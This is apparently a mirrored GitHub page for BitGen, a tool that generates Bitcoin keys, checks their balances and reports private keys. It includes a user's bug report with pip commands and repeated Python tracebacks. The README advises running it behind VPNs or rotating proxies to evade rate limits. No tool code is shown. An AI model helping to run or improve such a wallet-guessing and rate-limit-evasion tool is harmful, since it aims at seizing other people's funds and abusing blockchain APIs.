Git Product home page Git Product logo

bitgen's Introduction

BitGen

Donate

  • BTC: 1assTGVhuCnrix5LvhL2GXEkSS3fS2XBT
  • ETH: 0x872187EECC9523af2A9BcA6B1e9b95B516c88f5e

Development setup

pip install -r requirements.txt
python3 main.py -h

Release History

  • 0.2

    • Optimized the code it now check 6000 addresses per second
    • Still need to implement offline mode
    • Still need to implement proxy/vpn support so make sure to run this with a vpn enabled or an auto switch proxy app
  • 0.1

    • Fixed the API and spaghetti code problems, also now it gives you the Private key instead of mnemonic key, more accurate that way
  • 0.0.1

    • initial release

Meta

Anas Arbaoui – @Anarbbb[email protected]

Distributed under the GPL-3.0 license. See LICENSE for more information.

https://github.com/Anarbb/

Contributing

  1. Fork it (https://github.com/Anarbb/BitGen/fork)
  2. Create your feature branch (git checkout -b feature/fooBar)
  3. Commit your changes (git commit -am 'Add some fooBar')
  4. Push to the branch (git push origin feature/fooBar)
  5. Create a new Pull Request

Copyright

Copyright (c) 2021 Anas Arbaoui

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. THIS PROJECT IS ONLY MEANT FOR EDUCATIONAL PURPOSES.

bitgen's People

Contributors

anarbb avatar etidart avatar lkabuci avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

bitgen's Issues

error

I did all install requirements manulay , and didnt work. what is wrong. i use kali

pip install aiohttp==3.8.1
pip install aiosignal==1.2.0
pip install async-timeout==4.0.2
pip install attrs==22.1.0
pip install base58==2.1.1
pip install certifi==2022.6.15.1
pip install charset-normalizer==2.1.1
pip install colorama==0.4.5
pip install discord-webhook==0.17.0
pip install ecdsa==0.18.0
pip install fake-user-agent==2.1.5
pip install frozenlist==1.3.1
pip install idna==3.3
pip install lxml==4.9.1
pip install multidict==6.0.2
pip install requests==2.28.1
pip install six==1.16.0
pip install urllib3==1.26.12
pip install yarl==1.8.1


┌──(kali㉿kali)-[~/Desktop/BitGen-master]
└─$ python3 main.py -t 10 -v
2023-01-23 16:03:07 ERROR user_agent.py cannot schedule new futures after interpreter shutdown
You are rate-limited please switch to a vpn/proxy or you dont have connection
2023-01-23 16:03:07 ERROR user_agent.py cannot schedule new futures after interpreter shutdown
You are rate-limited please switch to a vpn/proxy or you dont have connection
2023-01-23 16:03:07 ERROR user_agent.py cannot schedule new futures after interpreter shutdown
You are rate-limited please switch to a vpn/proxy or you dont have connection
2023-01-23 16:03:07 ERROR user_agent.py cannot schedule new futures after interpreter shutdown
You are rate-limited please switch to a vpn/proxy or you dont have connection
2023-01-23 16:03:07 ERROR user_agent.py cannot schedule new futures after interpreter shutdown
You are rate-limited please switch to a vpn/proxy or you dont have connection
2023-01-23 16:03:07 ERROR user_agent.py cannot schedule new futures after interpreter shutdown
You are rate-limited please switch to a vpn/proxy or you dont have connection
2023-01-23 16:03:07 ERROR user_agent.py cannot schedule new futures after interpreter shutdown
You are rate-limited please switch to a vpn/proxy or you dont have connection
2023-01-23 16:03:07 ERROR base_events.py Task exception was never retrieved
future: <Task finished name='Task-1' coro=<main() done, defined at /home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py:201> exception=SystemExit()>
Traceback (most recent call last):
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 55, in fetch
async with session.get(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 1138, in aenter
self._resp = await self._coro
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 535, in _request
conn = await self._connector.connect(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 542, in connect
proto = await self._create_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 907, in _create_connection
_, proto = await self._create_direct_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 1154, in _create_direct_connection
hosts = await asyncio.shield(host_resolved)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 880, in _resolve_host
addrs = await self._resolver.resolve(host, port, family=self._family)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/resolver.py", line 33, in resolve
infos = await self._loop.getaddrinfo(
File "/usr/lib/python3.10/asyncio/base_events.py", line 863, in getaddrinfo
return await self.run_in_executor(
File "/usr/lib/python3.10/asyncio/base_events.py", line 821, in run_in_executor
executor.submit(func, *args), loop=self)
File "/usr/lib/python3.10/concurrent/futures/thread.py", line 169, in submit
raise RuntimeError('cannot schedule new futures after '
RuntimeError: cannot schedule new futures after interpreter shutdown

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/home/kali/Desktop/BitGen-master/check.py", line 21, in check_balance_btc
"User-Agent": user_agent()
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 263, in user_agent
return asyncio.run(main(browser, use_tempfile))
File "/usr/lib/python3.10/asyncio/runners.py", line 47, in run
_cancel_all_tasks(loop)
File "/usr/lib/python3.10/asyncio/runners.py", line 63, in _cancel_all_tasks
loop.run_until_complete(tasks.gather(*to_cancel, return_exceptions=True))
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 224, in main
await asyncio.gather(*tasks)
File "/usr/lib/python3.10/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 115, in write_to_dict
versions = await parse(browser, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 89, in parse
html_str = await fetch(url, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 62, in fetch
attempt = call_on_error(e, url, attempt, OP[0])
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 81, in call_on_error
sys.exit()
SystemExit
2023-01-23 16:03:07 ERROR base_events.py Task exception was never retrieved
future: <Task finished name='Task-22' coro=<main() done, defined at /home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py:201> exception=SystemExit()>
Traceback (most recent call last):
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 55, in fetch
async with session.get(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 1138, in aenter
self._resp = await self._coro
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 535, in _request
conn = await self._connector.connect(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 542, in connect
proto = await self._create_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 907, in _create_connection
_, proto = await self._create_direct_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 1154, in _create_direct_connection
hosts = await asyncio.shield(host_resolved)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 880, in _resolve_host
addrs = await self._resolver.resolve(host, port, family=self._family)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/resolver.py", line 33, in resolve
infos = await self._loop.getaddrinfo(
File "/usr/lib/python3.10/asyncio/base_events.py", line 863, in getaddrinfo
return await self.run_in_executor(
File "/usr/lib/python3.10/asyncio/base_events.py", line 821, in run_in_executor
executor.submit(func, *args), loop=self)
File "/usr/lib/python3.10/concurrent/futures/thread.py", line 169, in submit
raise RuntimeError('cannot schedule new futures after '
RuntimeError: cannot schedule new futures after interpreter shutdown

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/home/kali/Desktop/BitGen-master/check.py", line 21, in check_balance_btc
"User-Agent": user_agent()
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 263, in user_agent
return asyncio.run(main(browser, use_tempfile))
File "/usr/lib/python3.10/asyncio/runners.py", line 47, in run
_cancel_all_tasks(loop)
File "/usr/lib/python3.10/asyncio/runners.py", line 63, in _cancel_all_tasks
loop.run_until_complete(tasks.gather(*to_cancel, return_exceptions=True))
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 224, in main
await asyncio.gather(*tasks)
File "/usr/lib/python3.10/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 115, in write_to_dict
versions = await parse(browser, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 89, in parse
html_str = await fetch(url, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 62, in fetch
attempt = call_on_error(e, url, attempt, OP[0])
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 81, in call_on_error
sys.exit()
SystemExit
2023-01-23 16:03:07 ERROR base_events.py Task exception was never retrieved
future: <Task finished name='Task-43' coro=<main() done, defined at /home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py:201> exception=SystemExit()>
Traceback (most recent call last):
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 55, in fetch
async with session.get(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 1138, in aenter
self._resp = await self._coro
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 535, in _request
conn = await self._connector.connect(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 542, in connect
proto = await self._create_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 907, in _create_connection
_, proto = await self._create_direct_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 1154, in _create_direct_connection
hosts = await asyncio.shield(host_resolved)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 880, in _resolve_host
addrs = await self._resolver.resolve(host, port, family=self._family)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/resolver.py", line 33, in resolve
infos = await self._loop.getaddrinfo(
File "/usr/lib/python3.10/asyncio/base_events.py", line 863, in getaddrinfo
return await self.run_in_executor(
File "/usr/lib/python3.10/asyncio/base_events.py", line 821, in run_in_executor
executor.submit(func, *args), loop=self)
File "/usr/lib/python3.10/concurrent/futures/thread.py", line 169, in submit
raise RuntimeError('cannot schedule new futures after '
RuntimeError: cannot schedule new futures after interpreter shutdown

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/home/kali/Desktop/BitGen-master/check.py", line 21, in check_balance_btc
"User-Agent": user_agent()
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 263, in user_agent
return asyncio.run(main(browser, use_tempfile))
File "/usr/lib/python3.10/asyncio/runners.py", line 47, in run
_cancel_all_tasks(loop)
File "/usr/lib/python3.10/asyncio/runners.py", line 63, in _cancel_all_tasks
loop.run_until_complete(tasks.gather(*to_cancel, return_exceptions=True))
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 224, in main
await asyncio.gather(*tasks)
File "/usr/lib/python3.10/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 115, in write_to_dict
versions = await parse(browser, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 89, in parse
html_str = await fetch(url, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 62, in fetch
attempt = call_on_error(e, url, attempt, OP[0])
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 81, in call_on_error
sys.exit()
SystemExit
2023-01-23 16:03:07 ERROR base_events.py Task exception was never retrieved
future: <Task finished name='Task-64' coro=<main() done, defined at /home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py:201> exception=SystemExit()>
Traceback (most recent call last):
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 55, in fetch
async with session.get(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 1138, in aenter
self._resp = await self._coro
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 535, in _request
conn = await self._connector.connect(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 542, in connect
proto = await self._create_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 907, in _create_connection
_, proto = await self._create_direct_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 1154, in _create_direct_connection
hosts = await asyncio.shield(host_resolved)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 880, in _resolve_host
addrs = await self._resolver.resolve(host, port, family=self._family)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/resolver.py", line 33, in resolve
infos = await self._loop.getaddrinfo(
File "/usr/lib/python3.10/asyncio/base_events.py", line 863, in getaddrinfo
return await self.run_in_executor(
File "/usr/lib/python3.10/asyncio/base_events.py", line 821, in run_in_executor
executor.submit(func, *args), loop=self)
File "/usr/lib/python3.10/concurrent/futures/thread.py", line 169, in submit
raise RuntimeError('cannot schedule new futures after '
RuntimeError: cannot schedule new futures after interpreter shutdown

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/home/kali/Desktop/BitGen-master/check.py", line 21, in check_balance_btc
"User-Agent": user_agent()
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 263, in user_agent
return asyncio.run(main(browser, use_tempfile))
File "/usr/lib/python3.10/asyncio/runners.py", line 47, in run
_cancel_all_tasks(loop)
File "/usr/lib/python3.10/asyncio/runners.py", line 63, in _cancel_all_tasks
loop.run_until_complete(tasks.gather(*to_cancel, return_exceptions=True))
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 224, in main
await asyncio.gather(*tasks)
File "/usr/lib/python3.10/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 115, in write_to_dict
versions = await parse(browser, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 89, in parse
html_str = await fetch(url, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 62, in fetch
attempt = call_on_error(e, url, attempt, OP[0])
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 81, in call_on_error
sys.exit()
SystemExit
2023-01-23 16:03:07 ERROR base_events.py Task exception was never retrieved
future: <Task finished name='Task-85' coro=<main() done, defined at /home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py:201> exception=SystemExit()>
Traceback (most recent call last):
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 55, in fetch
async with session.get(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 1138, in aenter
self._resp = await self._coro
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 535, in _request
conn = await self._connector.connect(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 542, in connect
proto = await self._create_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 907, in _create_connection
_, proto = await self._create_direct_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 1154, in _create_direct_connection
hosts = await asyncio.shield(host_resolved)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 880, in _resolve_host
addrs = await self._resolver.resolve(host, port, family=self._family)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/resolver.py", line 33, in resolve
infos = await self._loop.getaddrinfo(
File "/usr/lib/python3.10/asyncio/base_events.py", line 863, in getaddrinfo
return await self.run_in_executor(
File "/usr/lib/python3.10/asyncio/base_events.py", line 821, in run_in_executor
executor.submit(func, *args), loop=self)
File "/usr/lib/python3.10/concurrent/futures/thread.py", line 169, in submit
raise RuntimeError('cannot schedule new futures after '
RuntimeError: cannot schedule new futures after interpreter shutdown

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/home/kali/Desktop/BitGen-master/check.py", line 21, in check_balance_btc
"User-Agent": user_agent()
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 263, in user_agent
return asyncio.run(main(browser, use_tempfile))
File "/usr/lib/python3.10/asyncio/runners.py", line 47, in run
_cancel_all_tasks(loop)
File "/usr/lib/python3.10/asyncio/runners.py", line 63, in _cancel_all_tasks
loop.run_until_complete(tasks.gather(*to_cancel, return_exceptions=True))
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 224, in main
await asyncio.gather(*tasks)
File "/usr/lib/python3.10/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 115, in write_to_dict
versions = await parse(browser, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 89, in parse
html_str = await fetch(url, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 62, in fetch
attempt = call_on_error(e, url, attempt, OP[0])
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 81, in call_on_error
sys.exit()
SystemExit
2023-01-23 16:03:07 ERROR base_events.py Task exception was never retrieved
future: <Task finished name='Task-106' coro=<main() done, defined at /home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py:201> exception=SystemExit()>
Traceback (most recent call last):
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 55, in fetch
async with session.get(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 1138, in aenter
self._resp = await self._coro
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 535, in _request
conn = await self._connector.connect(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 542, in connect
proto = await self._create_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 907, in _create_connection
_, proto = await self._create_direct_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 1154, in _create_direct_connection
hosts = await asyncio.shield(host_resolved)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 880, in _resolve_host
addrs = await self._resolver.resolve(host, port, family=self._family)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/resolver.py", line 33, in resolve
infos = await self._loop.getaddrinfo(
File "/usr/lib/python3.10/asyncio/base_events.py", line 863, in getaddrinfo
return await self.run_in_executor(
File "/usr/lib/python3.10/asyncio/base_events.py", line 821, in run_in_executor
executor.submit(func, *args), loop=self)
File "/usr/lib/python3.10/concurrent/futures/thread.py", line 169, in submit
raise RuntimeError('cannot schedule new futures after '
RuntimeError: cannot schedule new futures after interpreter shutdown

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/home/kali/Desktop/BitGen-master/check.py", line 21, in check_balance_btc
"User-Agent": user_agent()
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 263, in user_agent
return asyncio.run(main(browser, use_tempfile))
File "/usr/lib/python3.10/asyncio/runners.py", line 47, in run
_cancel_all_tasks(loop)
File "/usr/lib/python3.10/asyncio/runners.py", line 63, in _cancel_all_tasks
loop.run_until_complete(tasks.gather(*to_cancel, return_exceptions=True))
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 224, in main
await asyncio.gather(*tasks)
File "/usr/lib/python3.10/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 115, in write_to_dict
versions = await parse(browser, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 89, in parse
html_str = await fetch(url, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 62, in fetch
attempt = call_on_error(e, url, attempt, OP[0])
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 81, in call_on_error
sys.exit()
SystemExit
2023-01-23 16:03:07 ERROR base_events.py Task exception was never retrieved
future: <Task finished name='Task-127' coro=<main() done, defined at /home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py:201> exception=SystemExit()>
Traceback (most recent call last):
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 55, in fetch
async with session.get(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 1138, in aenter
self._resp = await self._coro
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/client.py", line 535, in _request
conn = await self._connector.connect(
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 542, in connect
proto = await self._create_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 907, in _create_connection
_, proto = await self._create_direct_connection(req, traces, timeout)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 1154, in _create_direct_connection
hosts = await asyncio.shield(host_resolved)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/connector.py", line 880, in _resolve_host
addrs = await self._resolver.resolve(host, port, family=self._family)
File "/home/kali/.local/lib/python3.10/site-packages/aiohttp/resolver.py", line 33, in resolve
infos = await self._loop.getaddrinfo(
File "/usr/lib/python3.10/asyncio/base_events.py", line 863, in getaddrinfo
return await self.run_in_executor(
File "/usr/lib/python3.10/asyncio/base_events.py", line 821, in run_in_executor
executor.submit(func, *args), loop=self)
File "/usr/lib/python3.10/concurrent/futures/thread.py", line 169, in submit
raise RuntimeError('cannot schedule new futures after '
RuntimeError: cannot schedule new futures after interpreter shutdown

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/home/kali/Desktop/BitGen-master/check.py", line 21, in check_balance_btc
"User-Agent": user_agent()
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 263, in user_agent
return asyncio.run(main(browser, use_tempfile))
File "/usr/lib/python3.10/asyncio/runners.py", line 47, in run
_cancel_all_tasks(loop)
File "/usr/lib/python3.10/asyncio/runners.py", line 63, in _cancel_all_tasks
loop.run_until_complete(tasks.gather(*to_cancel, return_exceptions=True))
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 224, in main
await asyncio.gather(*tasks)
File "/usr/lib/python3.10/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "/usr/lib/python3.10/asyncio/base_events.py", line 636, in run_until_complete
self.run_forever()
File "/usr/lib/python3.10/asyncio/base_events.py", line 603, in run_forever
self._run_once()
File "/usr/lib/python3.10/asyncio/base_events.py", line 1899, in _run_once
handle._run()
File "/usr/lib/python3.10/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 115, in write_to_dict
versions = await parse(browser, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 89, in parse
html_str = await fetch(url, session)
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 62, in fetch
attempt = call_on_error(e, url, attempt, OP[0])
File "/home/kali/.local/lib/python3.10/site-packages/fake_user_agent/user_agent.py", line 81, in call_on_error
sys.exit()
SystemExit
2023-01-23 16:03:07 ERROR user_agent.py cannot schedule new futures after interpreter shutdown
You are rate-limited please switch to a vpn/proxy or you dont have connection
2023-01-23 16:03:07 ERROR user_agent.py cannot schedule new futures after interpreter shutdown
You are rate-limited please switch to a vpn/proxy or you dont have connection
2023-01-23 16:03:07 ERROR user_agent.py cannot schedule new futures after interpreter shutdown
